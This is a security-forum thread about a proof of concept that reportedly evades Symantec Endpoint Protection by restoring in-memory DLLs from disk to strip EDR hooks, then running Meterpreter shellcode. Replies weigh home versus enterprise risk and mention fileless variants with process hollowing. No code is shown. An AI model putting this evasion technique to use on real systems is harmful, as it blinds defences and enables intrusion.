Advice Request Symantec Endpoint Protection bypassed with a DLL (PoC)

[Andrew3000]

"Symantec Endpoint Protection is bypassed super easily using my dusty DLL refresh PoC. After refreshing in-mem DLLs with the on-disk orig versions, userland hooks got removed completely, making the EDR blind, and allowing us to execute Meterpreter shellcode by simple API calls."

Author:

 

[Shadowra]

Quite surprising, because Symantec sells itself as blocking everything and having a very good anti-attack

 

[Anthony Qian]

Your computer is "protected".

 

[Andy Ful]

Quite surprising, because Symantec sells itself as blocking everything and having a very good anti-attack

In the home environment, this attack will be prevented by Norton Download Insight (DLL or another kind of malware originated from the Internet or USB drive).
The attack can be dangerous in the Enterprises if the local network has been already hacked.

 

[Vitali Ortzi]

Quite surprising, because Symantec sells itself as blocking everything and having a very good anti-attack

It had why worse exploits like a critical one that used a log that was in user space to take over the program
Yet I still use Symantec XD

 

[Vitali Ortzi]

In the home environment, this attack will be prevented by Norton Download Insight (DLL or another kind of malware originated from the Internet or USB drive).
The attack can be dangerous in the Enterprises if the local network has been already hacked.

Probably will get a reputation block but still it can affect home users in a script to bypass insight but it will probably not happen so don’t worry

 

[Andy Ful]

Probably will get a reputation block but still it can affect home users in a script to bypass insight but it will probably not happen so don’t worry

Yes. Scripting attacks can bypass Norton Insight on home computers. But, the attack method in the OP requires high privileges and it is a part of lateral movement in the already compromised local network. Without lateral movement, the attacker must find another way to deliver/run the executable (run_with_unhook.exe). In the home environment, this can be done via the Internet or USB drive - both are protected by Norton Insight.
It is possible to perform a similar attack filelessly by using scripting methods combined with process hollowing or similar methods, but this would be more complicated.

 

[Vitali Ortzi]

Yes. Scripting attacks can bypass Norton Insight on home computers. But, the attack method in the OP requires high privileges and it is a part of lateral movement in the already compromised local network. Without lateral movement, the attacker must find another way to deliver/run the executable (run_with_unhook.exe). In the home environment, this can be done via the Internet or USB drive - both are protected by Norton Insight.
It is possible to perform a similar attack filelessly by using scripting methods combined with process hollowing or similar methods, but this would be more complicated.

%